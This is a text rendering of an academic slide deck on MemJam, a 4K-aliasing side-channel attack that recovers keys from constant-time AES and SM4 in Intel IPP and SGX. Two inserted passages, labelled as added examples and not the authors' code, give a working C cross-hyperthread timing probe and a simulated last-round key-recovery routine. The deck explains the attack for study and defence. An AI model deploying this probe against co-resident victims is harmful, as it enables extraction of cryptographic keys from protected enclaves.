
MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX (Daniel Moghimi) - PowerPoint PPT Presentation



  1. #RSAC  Session ID: CRYP-T07
     MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX
     Daniel Moghimi, Ph.D. Student, Worcester Polytechnic Institute, @danielmgmi

  2. MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX
     Ahmad "Daniel" Moghimi, Thomas Eisenbarth, Berk Sunar
     April 17, 2018, CT-RSA 2018, San Francisco, CA

  3. Data Dependency
     • Data dependency: an instruction consumes data produced by a preceding instruction.
       1  add %ebx, %eax
       2  sub %eax, %edx      (reads %eax written by 1)
       3  xor %ecx, %ecx
       4  add %eax, %edi      (reads %eax written by 1)
       5  sub %ecx, %edi      (reads %ecx written by 3 and %edi written by 4)

  4-9. Data Dependency – Pipelined Execution
     • Pipeline stages: Instruction Fetch (IF), Instruction Decode (ID), Execute (EX), Write Back (WB).
     • The animation walks the five instructions above through the pipeline one stage per cycle:
       1  add %ebx, %eax      IF  ID  EX  WB
       2  sub %eax, %edx      IF  ID  EX  EX  WB   (stalls in EX until instruction 1 has written %eax)
       3  xor %ecx, %ecx      IF  ID  EX  WB
       4  add %eax, %edi      IF  ID  EX  WB
       5  sub %ecx, %edi      IF  ID  EX  WB
     • A true data dependency therefore costs pipeline cycles: the dependent instruction waits for its operand.

  10. Data False Dependency
     • Pipeline stalls without a true dependency.
     • Reasons: register reuse, limited address space.
       1  add %ebx, %eax
       2  xor %ecx, %ecx
       3  sub %eax, %edx
       4  mov $100, %edx      FD: overwrites %edx, which instruction 3 is still producing (write-after-write)
       5  sub %edx, %ecx

  11. Data False Dependency – Register Renaming
     • The same sequence after register renaming: instructions 4 and 5 get a fresh physical register (shown as %bat on the slide) instead of reusing %edx, so the false dependency on instruction 3 disappears.
       1  add %ebx, %eax
       2  xor %ecx, %ecx
       3  sub %eax, %edx
       4  mov $100, %bat
       5  sub %bat, %ecx

  12. Memory False Dependency – 4K Aliasing
     • Memory loads and stores are executed out of order and speculatively.
     • The dependency between a store and a later load is verified after execution:
       mov %eax, (%ebx)    Store  (execute)
       mov (%ecx), %edx    Load   (execute)  → Dependent? Yes
     • 4K aliasing: addresses that are 4K apart, i.e. that share their low 12 bits, are assumed dependent.
     • On a false dependency the load and the instructions that consumed its result are re-executed.
     • Virtual-to-physical address translation → memory disambiguation: the low 12 bits are the page offset and are the same in the virtual and the physical address, so the check can use them before translation finishes, which is why only those bits are compared.

  13-18. 4K Aliasing – Hyperthreading
     • One core, two hyperthreads (HT): Thread A and Thread B.
     • Thread A: Load 0xFECD1, Load 0xFECD2, Load 0xFECD3, Load 0xFECD4, Load 0xFECD5, Load 0xFECD6, Load 0xFECD7, Load 0xFECD8 – execute & time.
     • Thread B, concurrently, stores in a loop. The animation tries three store targets in turn:
       – Store 0x12ABCDEF (low 12 bits 0xDEF, no alias with the loads)
       – Store 0x12ABC200 (low 12 bits 0x200, no alias with the loads)
       – Store 0x12ABC (the address is cut off in the slide text)
     • The timed loads of Thread A slow down only when Thread B's store target shares its low 12 bits with them.
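The cross-hyperthread measurement of slides 13-18, written out as an added example (it is not the MemJam authors' code): thread B keeps storing to an address that shares its low 12 bits with the address thread A loads from, or, as a control, to one that does not, while thread A times a batch of loads. It assumes 4 KiB pages and Linux for CPU pinning (pass the two CPU ids of sibling hyperthreads on the command line; without siblings of one physical core no slowdown is expected), and the names pick_alias, storer, time_loads and self_check are the example's own.

```c
/* 4K-aliasing probe across hyperthreads (added example, not the MemJam authors' code).
 * Assumptions: 4 KiB pages; Linux for pinning; CPU ids given are sibling hyperthreads. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <pthread.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef __linux__
#include <sched.h>
#endif

#define PAGE   ((uintptr_t)4096)
#define REGION (64 * PAGE)
#define BATCH  2000000L

/* Address inside buf[0..len) on a page other than target's whose low 12 bits equal
 * target's (want_alias=1) or lie 64 bytes further on (want_alias=0, the control).
 * Returns 0 when buf has no usable page. */
uintptr_t pick_alias(uintptr_t target, const void *buf, size_t len, int want_alias)
{
    uintptr_t base = (uintptr_t)buf, off = target & 0xFFF;
    if (!want_alias) off = (off + 64) & 0xFFF;
    for (uintptr_t page = (base + PAGE - 1) & ~(PAGE - 1); page + off + 8 <= base + len; page += PAGE)
        if ((page ^ target) & ~(PAGE - 1))     /* skip the target's own page */
            return page + off;
    return 0;
}

static atomic_int stop_flag;
struct storer_arg { volatile uint64_t *p; int cpu; };

static void pin(int cpu)
{
#if defined(__linux__) && defined(CPU_SET)
    cpu_set_t set;
    if (cpu < 0) return;
    CPU_ZERO(&set); CPU_SET(cpu, &set);
    pthread_setaffinity_np(pthread_self(), sizeof set, &set);
#else
    (void)cpu;                                  /* no pinning available: run unpinned */
#endif
}

/* Thread B: the "Store ..." side of the slides, hammering one address. */
static void *storer(void *arg)
{
    struct storer_arg *a = arg;
    pin(a->cpu);
    while (!atomic_load_explicit(&stop_flag, memory_order_relaxed))
        for (int i = 0; i < 64; i++) *a->p = (uint64_t)i;
    return NULL;
}

/* Thread A: "Execute & Time" a batch of loads from one address; returns ns per load. */
static double time_loads(volatile uint64_t *p, uint64_t *sink)
{
    struct timespec t0, t1;
    uint64_t acc = 0;
    clock_gettime(CLOCK_MONOTONIC, &t0);
    for (long i = 0; i < BATCH; i++) acc += *p;
    clock_gettime(CLOCK_MONOTONIC, &t1);
    *sink = acc;
    return ((double)(t1.tv_sec - t0.tv_sec) * 1e9 + (double)(t1.tv_nsec - t0.tv_nsec)) / BATCH;
}

/* Checks pick_alias on a scratch buffer: 1 on success, 0 on failure. */
int self_check(void)
{
    uint8_t *buf = malloc(4 * PAGE);
    if (!buf) return 0;
    uintptr_t base = (uintptr_t)buf, target = base + 0x234;
    uintptr_t alias = pick_alias(target, buf, 4 * PAGE, 1);
    uintptr_t ctrl = pick_alias(target, buf, 4 * PAGE, 0);
    int ok = alias && ctrl
          && (alias & 0xFFF) == (target & 0xFFF)              /* same page offset ... */
          && ((alias ^ target) & ~(PAGE - 1)) != 0            /* ... on a different page */
          && alias >= base && alias + 8 <= base + 4 * PAGE
          && (ctrl & 0xFFF) == ((target + 64) & 0xFFF)
          && pick_alias(target, buf, 0, 1) == 0;
    free(buf);
    return ok;
}

int main(int argc, char **argv)
{
    int cpu_a = argc > 1 ? atoi(argv[1]) : -1, cpu_b = argc > 2 ? atoi(argv[2]) : -1;
    uint8_t *va = malloc(REGION), *vb = malloc(REGION);
    if (!self_check() || !va || !vb) return 1;
    memset(va, 1, REGION); memset(vb, 1, REGION);
    pin(cpu_a);
    volatile uint64_t *victim = (volatile uint64_t *)((((uintptr_t)va + PAGE) & ~(PAGE - 1)) + 0x3C0);
    static const char *label[] = { "no stores", "control stores (no alias)", "4K-aliasing stores" };
    uint64_t sink = 0;
    for (int mode = 0; mode < 3; mode++) {
        pthread_t th = 0;
        struct storer_arg arg = { 0, cpu_b };
        atomic_store(&stop_flag, 0);
        if (mode) {
            arg.p = (volatile uint64_t *)pick_alias((uintptr_t)victim, vb, REGION, mode == 2);
            if (!arg.p || pthread_create(&th, NULL, storer, &arg)) return 1;
        }
        time_loads(victim, &sink);                  /* warm-up */
        double ns = time_loads(victim, &sink);
        if (mode) { atomic_store(&stop_flag, 1); pthread_join(th, NULL); }
        printf("%-28s %.3f ns/load\n", label[mode], ns);
    }
    free(va); free(vb);
    return 0;
}
```

Run it as `./probe <cpu_a> <cpu_b>` with two sibling hyperthreads (on Linux, `lscpu -e` or /sys/devices/system/cpu/cpuN/topology/thread_siblings_list shows the pairs). The control run keeps the store traffic but breaks the low-12-bit match, so any extra time in the third run is attributable to the false dependency rather than to the sibling thread merely being busy.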

  19-23. MemJam – Intra Cache Line Resolution
     • Least 12 bits of the address: virtual address = physical address (page offset).
     • Rest of the bits: virtual != physical.
     • L1 cache attacks and L2/LLC cache attacks observe the cache-line part of the address:
       – 2005 – Percival – Cache Missing for Fun and Profit
       – 2006 – Osvik – Cache attacks
       – 2014 – Yarom – Flush+Reload
       – 2015 – Irazoqui – S$A
     • MemJam goes below cache-line resolution: intra-cache-line leakage at 4-byte granularity.
     • Higher time correlates with memory accesses that share address bits 3 to 12 (bits 2 to 11 when counted from zero, i.e. the page offset at 4-byte granularity).
     • Within a 64-byte cache line that is 4 bits of intra-cache-line leakage: 16 distinguishable 4-byte positions.

  24-31. MemJam Attack
     • CPU with two cores, each running two hyperthreads (HT). The encryption service runs on one HT; the attacker runs on its sibling HT of the same core.
     • Victim execution trace: load, compute, load, load, compute, load, compute, load, load.
     • The attacker keeps storing to an address that 4K-aliases with the victim's secret-dependent loads; the falsely dependent loads, and the computations that consumed them, execute again.
     • Higher time if there are more 4K conflicts, i.e. if more of the victim's loads share their low 12 address bits with the attacker's store target.

  32-34. Constant-time AES – Safe2Encrypt_RIJ128
     • Scatter-gather implementation of AES
     • 256-byte S-box – 4 cache lines of 64 bytes
     • Cache-independent access pattern
     • Implemented and distributed as part of Intel products: Intel SGX Linux Software Development Kit (SDK), Intel IPP Cryptography Library
     • S-box lookup: the byte at the same offset (LINE 2 in the diagram) is read from each of the four lines A, B, C, D into a local buffer, and the wanted one (B) is then selected from the buffer. Every lookup touches all four cache lines, so which lines are accessed does not depend on the index; the offset inside the line still does.

  35-39. MemJam Attack on AES
     [Diagram: the 256-byte S-box as 4 cache lines of 64 bytes; the animation narrows from the four "LINE 2" positions down to the single intra-line position the attacker's stores alias with.]

  40-41. AES Key Recovery
     [Plots only; no text on these slides.]
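A simulated version of the key recovery of slides 32-41, as an added example that is not the authors' code: it models the leak of the scatter-gather S-box lookup (only bits 2 to 5 of the index, the 4-byte position inside the 64-byte line, reach the attacker), generates constructed last-round observations whose time grows with the number of lookups that land in the monitored position, and ranks key-byte candidates by a difference of means. The last round is used because with a 4-bit leak a first-round attack on the index p XOR k would only pin down 4 bits of each key byte, whereas the inverse S-box makes the last-round index depend on the whole key byte; ShiftRows is ignored since each ciphertext byte is recovered on its own. The timing constants, the noise model and the names slot, simulate, recover_byte and demo are assumptions of this example.

```c
/* Simulated MemJam-style key recovery against the last round of a scatter-gather AES
 * (added example: models the leak described on the slides, not the authors' code). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define NBYTES   16
#define HIT_COST 10.0      /* assumed extra time per lookup in the monitored 4-byte position */

uint8_t SBOX[256], INV_SBOX[256];

static uint8_t gf_mul(uint8_t a, uint8_t b)
{
    uint8_t r = 0;
    while (b) {
        if (b & 1) r ^= a;
        a = (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1B : 0));
        b >>= 1;
    }
    return r;
}

/* Build the AES S-box from the GF(2^8) inverse and the FIPS-197 affine map. */
void build_sbox(void)
{
    for (int x = 0; x < 256; x++) {
        uint8_t inv = 0;
        if (x) { inv = 1; for (int i = 0; i < 254; i++) inv = gf_mul(inv, (uint8_t)x); }
        uint8_t s = 0x63;
        for (int r = 0; r < 5; r++) s ^= (uint8_t)((inv << r) | (inv >> (8 - r)));
        SBOX[x] = s;
        INV_SBOX[s] = (uint8_t)x;
    }
}

/* Safe2Encrypt_RIJ128 touches all four S-box cache lines on every lookup, so only the
 * offset inside the line (index & 0x3F) depends on the index. With MemJam's 4-byte
 * resolution the attacker observes bits 2..5 of the index: one of 16 positions. */
int slot(uint8_t index) { return (index >> 2) & 0xF; }

static uint64_t rng = 0x9E3779B97F4A7C15ULL;            /* xorshift64, fixed seed */
static uint32_t rnd(void) { rng ^= rng << 13; rng ^= rng >> 7; rng ^= rng << 17; return (uint32_t)(rng >> 32); }

/* Constructed observations: random last-round input bytes s, ciphertext c = SBOX[s] ^ k10,
 * and a time that grows by HIT_COST for every lookup whose position is the one the
 * attacker's sibling-thread stores 4K-alias with, plus uniform noise in [-30, 30]. */
void simulate(const uint8_t *k10, int mon, int n, uint8_t *ct, double *t)
{
    for (int i = 0; i < n; i++) {
        int hits = 0;
        for (int j = 0; j < NBYTES; j++) {
            uint8_t s = (uint8_t)rnd();
            ct[i * NBYTES + j] = SBOX[s] ^ k10[j];
            hits += slot(s) == mon;
        }
        t[i] = 1000.0 + HIT_COST * hits + (double)(rnd() % 61) - 30.0;
    }
}

/* Recover k10[j]: for each candidate, the mean time of the samples whose predicted
 * index INV_SBOX[c ^ cand] falls in the monitored position, minus the mean of the rest.
 * Only the correct candidate lines up with the real hits; the other 15 bytes average out. */
uint8_t recover_byte(const uint8_t *ct, const double *t, int n, int j, int mon)
{
    double sum[256] = {0}, total = 0;
    int cnt[256] = {0};
    for (int i = 0; i < n; i++) { sum[ct[i * NBYTES + j]] += t[i]; cnt[ct[i * NBYTES + j]]++; total += t[i]; }
    double best = -1e300;
    int bestk = 0;
    for (int k = 0; k < 256; k++) {
        double hs = 0; int hc = 0;
        for (int v = 0; v < 256; v++)
            if (slot(INV_SBOX[v ^ k]) == mon) { hs += sum[v]; hc += cnt[v]; }
        if (hc == 0 || hc == n) continue;
        double score = hs / hc - (total - hs) / (n - hc);
        if (score > best) { best = score; bestk = k; }
    }
    return (uint8_t)bestk;
}

/* Whole attack on a random last-round key: returns how many of the 16 bytes were recovered. */
int demo(int n, int mon)
{
    build_sbox();
    uint8_t k10[NBYTES];
    for (int j = 0; j < NBYTES; j++) k10[j] = (uint8_t)rnd();
    uint8_t *ct = malloc((size_t)n * NBYTES);
    double *t = malloc((size_t)n * sizeof *t);
    if (!ct || !t) return -1;
    simulate(k10, mon, n, ct, t);
    int ok = 0;
    for (int j = 0; j < NBYTES; j++) ok += recover_byte(ct, t, n, j, mon) == k10[j];
    free(ct); free(t);
    return ok;
}

int main(void)
{
    int ok = demo(20000, 5);
    printf("recovered %d/16 last-round key bytes from 20000 observations\n", ok);
    return ok == NBYTES ? 0 : 1;
}
```

A wrong candidate only scores in proportion to how many of its 16 predicted ciphertext values coincide with the true candidate's set, which for the AES S-box is a handful at most, so the correct byte stands out well before the 40K observations the SM4 slide mentions; on real hardware the noise is heavier and the per-hit cost smaller, so more samples are needed, but the ranking step is the same.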

  42. SM4 Block Cipher – cpSMS4_Cipher
     • Standard cipher supported by Intel
     • Chinese national standard for wireless LAN (WAPI)
     • S-box + unbalanced Feistel structure
     • Protected by cache state normalization
     • Recursive attack → full key recovery with 40K observations

  43. MemJamming Intel SGX Secure Enclave
     • Same setup as the MemJam attack: the encryption service now runs inside an Intel SGX enclave on one HT of the core, the attacker on the sibling HT.
     • The victim's trace (load, compute, load, load, compute, load, compute, load, load) executes again where its loads 4K-alias with the attacker's stores; higher time if there are more 4K conflicts. The enclave boundary does not change the shared-core microarchitecture.
